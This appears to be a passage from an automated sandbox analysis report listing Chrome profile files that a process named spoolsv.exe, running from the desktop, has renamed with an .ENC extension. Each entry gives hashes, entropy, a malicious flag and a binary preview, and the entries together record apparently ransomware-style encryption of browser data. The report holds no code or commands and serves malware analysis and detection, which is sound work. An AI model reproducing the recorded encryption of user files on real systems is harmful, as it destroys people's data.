                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3504
                                                                                                                                                                                                                                                      Entropy (8bit):7.952232132268491
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:qmBXI6xyH9Nxyr3D9zanW/HFZIMK+nwTdHUg4J:qmBXREHhqT2UtKOwh01J
                                                                                                                                                                                                                                                      MD5:B88BB82F3568C3483D63119599DEBDE6
                                                                                                                                                                                                                                                      SHA1:4C2E00F1074F09907832278158910176D3208B7B
                                                                                                                                                                                                                                                      SHA-256:07CBA6F01AC9936873511BDE2C248DFEEC643E927CB393E1F4BB07ABFFEAADEC
                                                                                                                                                                                                                                                      SHA-512:909DB873D7ECE0C600C48C3D9C0CF0B2EC58C902D7F7F572E95BD9BA00080803D977B88111B4D5BD5BD6E900B5A68FEB0690ED2AAD90C4F667CE34CA9A9A5446
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...O...q.[*.t.V86q....nS.]6=...>k.P.+.X..g......m..Iv.|...U~-.s..N..Yi".*2L4.Q.o..%O^..H....Y!.xGl_..[..1....xMPj..-U.h..BF.8...c...4JEA>....-J.a.2.....0...T=.....h....)j..F..mK\./..&..r.d.Y..dG........O.`}........,qvD..}..:..\....]@.@..N.o...O....p..........)..........ho....H.........1...cu....+.....j...>~D..I...j.XhA.C^%.w....j.9.....n..8..K(P....q....8.9Mw*.=....O..x.(./.....d6.P?.._............)\..:.+I..v.|.z.H#...dK9a.<.+w.e....o..I[.p.].Tz..MU.v/(....+.P..U..h.L..B[.......n.........;..j.q.......z\.e.p.Vv._.m.WXA.... .x..!......g..q0.D..6y.a.Pd...(..-m.N2...D.............)...~:{....k&.J.......l............~.-X..5^Z.U.`.4txr....K0..M...V.Q.%.\N.c3......B.u.......$&.=.......a..1M.E.Q....>......._...}.}..c.T.&..2.......o.V..b.H.h...+l.iT.HG.0D e...9 .0n...}.T...........*...TB....".i^V.m...`xh.2..d!..o ..7..+.....W.{lS..~.F..{.f1.Hlq...X...DN.....aD....e..6p.....y...|]r..l..A.8.......i.g.qz.*D...*g.."v.`..2.[@....%...{......^<K.X.=8L..[.....D.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):336
                                                                                                                                                                                                                                                      Entropy (8bit):7.2971043185143465
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:mqwjLHou6b9f/gUsmkWy2SqDqOEODU9pUO8seIYxUQu5IoEL5btBQ72xq+XUmNES:CR6R3cm4qDFULj8X/l2IZVbk2xvklSn
                                                                                                                                                                                                                                                      MD5:9ECCAC33359DF4912641C5AEF5BD4BCA
                                                                                                                                                                                                                                                      SHA1:7A0E4F0ECC7DBB1F9D287AB9997A1E198732B8F1
                                                                                                                                                                                                                                                      SHA-256:3AFFAF2C383844EB541536389AF605FDF226C1C09E5846728786600796F0387D
                                                                                                                                                                                                                                                      SHA-512:15D8109D382DEF494F93029D0A110505836118A16DEAA91B576DAE31FB70FB8AC138ECE66A8225A5AE7E487FDF97035E0750512AB10DFD321E78250378451C73
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<....|......}.M,.....i).d.TUO?.l.}.m%J.d..DI....LY!v..5...............G.H..O..,vc.q...._..?....S...}%..I.*.]..v..E.G.A.......a .G..(..+f_q....8SY..6....."..............[.%..s....q.c5.0f.....s..0...H.u...~.9f~et.l...........R..\..]/Ma.h..r....F.H0..S.i./i}....+=!&e..Om...s....a.06W./j`2.3.Z.d.U...?"..pJ..:.p_=CGv?...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\MANIFEST-000001.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.543295834054493
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:qb0z5ZjCY:+aH
                                                                                                                                                                                                                                                      MD5:00B5963CADCB5E972047846E44EE2632
                                                                                                                                                                                                                                                      SHA1:3741D074C652E62798A616ED56C811482AF90C65
                                                                                                                                                                                                                                                      SHA-256:AD5D4ADA9FA65FCFCC5B74692628D26993377029E512DC6FC103A8819650AD66
                                                                                                                                                                                                                                                      SHA-512:ACC0812854372F9CE7AE2854D5EDB6D4B02D820E275524CEDA2329495CCE7D0CB3E8455A426E67BBBAA8CA2F5C1701D68FF1444DD0318EEE647717EC264B308E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...P...`&)....Y..R.r...........yT.?.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1120
                                                                                                                                                                                                                                                      Entropy (8bit):7.830351399705233
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:PG+x5r5OITKcsUfJZCezGAU/S0QIaAM9IZGVb9zpJ4:O+Dr4AuUfJZlm9QIG9IORzw
                                                                                                                                                                                                                                                      MD5:264913F9F89A180A22AA3BDA14AEAF2C
                                                                                                                                                                                                                                                      SHA1:16089A212AA744B8AB4177BDF74836403D310520
                                                                                                                                                                                                                                                      SHA-256:19F5333C9E4C48B2C5DC11678561A5E9857C5851BFB8DC67E69D185F74E30CE2
                                                                                                                                                                                                                                                      SHA-512:DE7513E28A87613CB293FC94EF4E871AEAC83419B1BDB6E072BA7E73A1D7D7362EE517684C4DA67DDA8EF2F6DE31C163711ED75E3B9DF4F836B5B304104D9ED4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....l..d.\..VW.:.d..3.....'.l+.C.....c.h.AN..J.?....!X.....L.B.....1Q.>.B.s..J.].ugU..'>..\.'..2.sC..WA1.......x..ikc+...C.%....=...b+k.K.....*:./.."&.b;.@H.....eS...wK1e.yn-....^.^..K...c.,.....!-.Y.9.;3...~>.#.....l.&l9.u....8.pT....<.A..sVpV...0E..D@<m"....R...pQ........Z.z..x.I..gM2.....w.\..s.f..8......._$.3.T.'-....bi.o%Q....]....;.....r..I.. .L.:.<.D.....W ..@..(..u..Qv(.C.i.U........`Z......... ...uH.Ifo~iYg@../R.!.....R...."....Md.+.....q:....w(..<..82.....J...8yWB...|..... .....|....h....- s..0@...H..M*...D...pxF...fW/9..s.W..}.*r.K.kQ.?e.H..6.U......u..7w...j.#f...+tXu9R1%o...yW.....b?.F...U.d.U.,.I.bqm..-.(..y.^.....Y..Yw..W.X.I.V......3.T]p..U%...9...z.......D.....D....3.:.BP......u......C...`P.../.(......&(j....v..h.....%.b.U..S>+.g...{V.;}R.<.8..lv...x....?kA...U .w..1}.v."0.1..c.KF.Ua......|.f..RP.......lP.O.qW...Z.......B.&&...M[.R.|d.....}j~............6,..k1.#.B..j1Q..f.W)&..ty...[..^-C3z....7T@......3.0..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\CURRENT.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:QRzgTczBv:Q5d
                                                                                                                                                                                                                                                      MD5:328FC1F4C693CE30D6A0FB47D34D59E3
                                                                                                                                                                                                                                                      SHA1:A49BAAFDEFA3CE958AA56709FF598FBA601A8798
                                                                                                                                                                                                                                                      SHA-256:F6F0E310BCA7FD98AA03FE19DDCBB88434AFBBBC51A64774405F82DD457CBA2B
                                                                                                                                                                                                                                                      SHA-512:B1CF96413C6D8BEB6D3A6D26CCA9068DF4B7EAD78D4C0E7454AC7D4B938BA49311B060A6C7B8277C7A8A667C6A9A674C0063EA05EAA2F205F110ADB9534A28BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...Y.4.t*..V.h=.#..x..k..Y.$.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):352
                                                                                                                                                                                                                                                      Entropy (8bit):7.382127970961942
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:mqwNySXCsK/QMjLJ61MLt77cjcXOho8AoSjBbiqKHXGJiw6GxLQOf5/UuHPvD:FSXpwL01Mp77cgXkAocGhH2JiPG3f9U0
                                                                                                                                                                                                                                                      MD5:37AC9241B87C4055A694AA9DE9D1FBF6
                                                                                                                                                                                                                                                      SHA1:055665FB5FA722541281005B2300C3E9D0B3735D
                                                                                                                                                                                                                                                      SHA-256:D0D937C14A84405C056D452DBDDFBF26C33BEEEF328693C9544BE24D5C515C44
                                                                                                                                                                                                                                                      SHA-512:02931503D3DB64C3D329EEA7FDFAA1C980A11B84977ED7654AA1A36DEE52361F26002F0477614FA21E8E444DA926FA57436AA12692206EDFC07542CAEF7E60A2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<....|......}..1&.)( E..|w.kH..D..%....o..F.Z../..M...../..a....-..47%.n...2."...o..t.L....7)...\N...\^%...P...q.R. Dc.<.A....&.~......k........C.Sp?}.Y%...'a..'..c.~.z:.{.qQ-.....Dh...C...?\..w..a.`-..&..M.;8Q..Ac.x.......>..%59..._.......Y..Na=..Lh.....T`..i..hV$.d7(R}.z..{+h0..5<.!.S......%=.E/.)a.......e..`....^.[.....J..p..X..I.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):352
                                                                                                                                                                                                                                                      Entropy (8bit):7.3943168745285694
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:mqw04/AJd9bD6U6fUdwGJLXxhwTVkgokr03diWIzhyQtigODX6VLMn:5FZD6U6fJeX2tokr0A9hJcPWV4
                                                                                                                                                                                                                                                      MD5:B555A06A9B575DE8A6E6699F981CAD7F
                                                                                                                                                                                                                                                      SHA1:348B5E74693F2ACF09CF72A03B19523F67207584
                                                                                                                                                                                                                                                      SHA-256:2B7A9CFE30D2E4442F3CB77A5D4C5F1A8B6B90A21F648D61A82A51817E1FDB99
                                                                                                                                                                                                                                                      SHA-512:4C3319B911B00477A6611F50EBCF97D611EF2D4E7C2E742279179AC2B30C158BDC3E763B9F5F91FB61413F6B2F6A205C788EBC499D43D8EBA08B68FB928AF98F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<....|......}.>.\..A..b.1....y .....#...F.9.a5...5.c.R...xp.?B.@X.....h}].z."..n...3.....,..%.D..T..3..,?cm..1..L..R..S.5..$...G.B....B.Le.>....A*N|.r.D..bh..1N.:..v..a..._Wg.......w9..f.l."O'.XE(;Z......u...b.b.............y....H..,..y...Tl. rCW.....U.z.^e..H....R........[Q .FI...q...t...+....1dnM..}%7..b(2...4....l|..)..5...)...g..)

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.418295834054493
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:0ylLURz6Y4OZn:0yapZ
                                                                                                                                                                                                                                                      MD5:D263B4C57CAA5D33C6E852FFAC47482C
                                                                                                                                                                                                                                                      SHA1:37B2DC67510A44DDC62D21AA7BA229360D1B0C8B
                                                                                                                                                                                                                                                      SHA-256:0D53B005CC360C2FA7475E6F97D77027007EC986E16DDA8A01F03623A1DE423D
                                                                                                                                                                                                                                                      SHA-512:503A33FC7FA7968F188B5780BD8F947153EC6FFC0579F6511616E75E612C8CE2B0B0953E7AB2083DB291293B099BB2CA9D66FB3996B4C2113AF9C4DFB33C404B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.h........._\V0..<..p..c....KZ..}.l.sq.^o.r.ot

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\First Run.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.976476479749426
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:AV/dl0y0I+MPCYUOfuDXy62mNh7u0rivopitLisZ1:lI+CjPkh7uKyOsn
                                                                                                                                                                                                                                                      MD5:67D3449FFB71C8F77E8276A4A7B01E68
                                                                                                                                                                                                                                                      SHA1:66559D1BCF962A19C9B372FF11E5DFBD2BD33EAC
                                                                                                                                                                                                                                                      SHA-256:EB89E207F7202F540EDFF526C592ABCB5CC4CB92FB5AA8A0DFCB292B7EC5DDCF
                                                                                                                                                                                                                                                      SHA-512:21C9A906E8D104F9128255A058EC01BE0927FB2FD0F9B43961BBB29F537319A6B2B34156C2EC3BDD4FE9B875B00B5693ADDFFF4C7500054AFDF4D13D2C377F57
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Z.l._....up......eh..<.S.._YE<M)e...... pKd9.q....=i......!.{..?....@..:.(ZW..P=yI...6.^ .#2..Hk.W..k.y.a. ...].iu.C[3iM'....g.x.b...n.v.;.M....w.G+.W......vY.}..Wp.M.p'.;l^.L..........G...D.4B...X...+^..??.|O".........1...-.v.N|...Vu....K%.y.R!..T.....=?.g....G....$niu...&....!... .gU|....-.~....X...d...D......m+.I..q).EU..u.C.."3...]..CK<..^)+....!r..C..w..&..9.......?......&.1.Y.g..ZL..U...b.u.+..~}..U.w..+~.X)..A..b..>.Y...}.O..._.2i...-G........sj#N.....Pu..F....s.]..d.........@...yu.?".."FzB.sn7..!Sez.v.Y.x....G040`.g......>..{..VrS;.. ......1x..[....k..7qN;v..?......<.........".'..]/X.O....".......c.j.z..XJ....hJ$....&N.}....aa.BF..].\..i7......]...e....[.?L.d...Y..H9\...Q...V.V.....Jy.....59Z..CR.&[e.)OU[...n>..`.Gd..?`..Eu...f.6......=..+"..S.|.^..a..=PN7......+T..Ux;..7......u...]8.b?..wg1!b........=....OI#.|/${..*.2.....,.....V4.Az...C..i1.Hi[.w\K.=... ..T?6....k...N....._%.+..."_Ja..*........b...KAE...W.C.\r..x.<..0...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):270352
                                                                                                                                                                                                                                                      Entropy (8bit):7.999233104629878
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:25hujpp6uK1BmNB+ONY/bJdrl7QfDtxYkYfIHrStor7h:djpjKbqcSQbPrFQfDlxuox
                                                                                                                                                                                                                                                      MD5:944DDF0713D7FE5697B9156C9B86F5C5
                                                                                                                                                                                                                                                      SHA1:ADAF97427D2141AD958E12F05DE767EB74D27140
                                                                                                                                                                                                                                                      SHA-256:41ADB97B614A126E0B195A3F9721FD8C8B8846B927148A1614C4E7B1585715D9
                                                                                                                                                                                                                                                      SHA-512:BAE62EAF26A2DBC68D1FBCF715F3B6B59FCD2FF596D172A457B657BCD298108A425CC492C0FC265BAC852252DFF941C3AA8B580880A0E7D4D11E02D79F6922B6
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:/.NR/.,..[........!>...T..pl...DO...m~r.P....v...p.A_..I .G].....K}.U9C...g..v.} ?....RZ4..E.N...ij...q..N..L.^....9...>q.{%vj.I.e....v...5.._r..eWZe....M|....*-..4._.....~p.........G-<...H...=.U.....?A..DO'F|"....H..R)a.ds..R.kD;&].kk.%...D.=U.1).....z..e.5'......~;oE.1.o.d..7..........">...jq.R.R.f..Q./e..D...".,.B..C........~...i.5.@.s..E.C..pv.l...F...l..^...#.yh/.I..-V.......W....$.~.......Z...Z.`..........m.0.li...{^._Q.....l....:....O..R.Tl....h..."...O..(S....\...ql.~.....j:.d..(0.S....e...z.v2...`...."BS..<.=`.....W7.......7}...m!dF....e.D.n.@..f......a.'..Z._\...9..............q^M0....).[/.....a..I.+.T.....1u6.....s.....+0..\......KXF..........8.Y.\c.\+...~v....e.......k.G7.......NG.Y.......1..'..yA._.z.........r.._`KV....p..gJ..=i..I.Y.r...;.r...QMX....s'.J...m.....1..y0. ..q...z.&....3...x./.?r.D.&...h@l........A.....n....+|F.}...8..r.0...)...?.#.%2R.j....-......6p.1;.\..#..D..M.3.H.....P.G.|...9.B.vT....a.@.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_2.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.97783199729344
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:RUHUxe7HbS93HchHpRe963lNr30dKq3C5WakFajRY:OH+9MhJs963lNgK78aiyRY
                                                                                                                                                                                                                                                      MD5:E9570C05758D7F027A0B6D30D775B2AE
                                                                                                                                                                                                                                                      SHA1:0871E5E41EE6DF7681704EDC4A15D0F108CCCF0A
                                                                                                                                                                                                                                                      SHA-256:971C1D9CB490C2100654763CCB68E021CEAF307786ACBC54AB8B5E870528FF55
                                                                                                                                                                                                                                                      SHA-512:C1BB33C8AD522EABC58BD7DC564ABB99FE2D6F3F5B839AF5CBBE2C31CDDCBF2D543625D5E0D8741C06CCF8CACF58B33DFDA9CBAEEBAC72F03182F4B882F0CF7B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:O4'|."c.V...}.j..V!.5.c..:..E..}O..*.....nv..}...*k.f...q....mUe$4..~.G...M.-]......V.i.s....o..hRQ.........nc...q.xb.rNg.....K..6.R....9u.:.*...... ..;...#.......wb....ia.Z....sy.m...........J=.-.5.K9..hu.:.;*u...A$...<u.#..<......_>._.m..n.v..rH......C.|...s$.P...h3..T..v..../|U...!~9...s".d...w..S...D...y......R..Ws..5...X..9T.(.e..N....Q....x.].....~E........h.0.`~..u:Z@?w...m....Y...0..3..W.........\....]....AR.73T9....H...~..7Z..Y`cI.B.9.LZ.]....:.I.g#...4.@...fa.....~;L.......7.8.R.5E.5g.....)w...........|.>......|.&;.G!.....6.-...oD\!.[..~....,|n.%._.l:..p.w..bF.O@......Q..MZn%..="B,..:./.ZJi>&#.c3j.O.M.f.....fhH;.....A.......0}b......` .C..0?...bU....ZX.b&..B2w9..8..%...>A..O..Y..w.U.Z.G.....?..[]|....M.rs..r..$.._U..k...Yb...[I..+......i_!n'o.d....^..Y...3.Bu..C..f...U.y..y.&c...\.(9ZG$B(.....w.....^}..g!.......uE..=SQJm..z...Kv.P....iu.i.F.G.P.#y.Z.J......@..)$..}.^...t.f.+........SJ....a~]b......m;.........Y..XLj9.d_5.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_0.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.976476479749426
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:AV/dl0y0I+MPCYUOfuDXy62mNh7u0rivopitLisZ1:lI+CjPkh7uKyOsn
                                                                                                                                                                                                                                                      MD5:67D3449FFB71C8F77E8276A4A7B01E68
                                                                                                                                                                                                                                                      SHA1:66559D1BCF962A19C9B372FF11E5DFBD2BD33EAC
                                                                                                                                                                                                                                                      SHA-256:EB89E207F7202F540EDFF526C592ABCB5CC4CB92FB5AA8A0DFCB292B7EC5DDCF
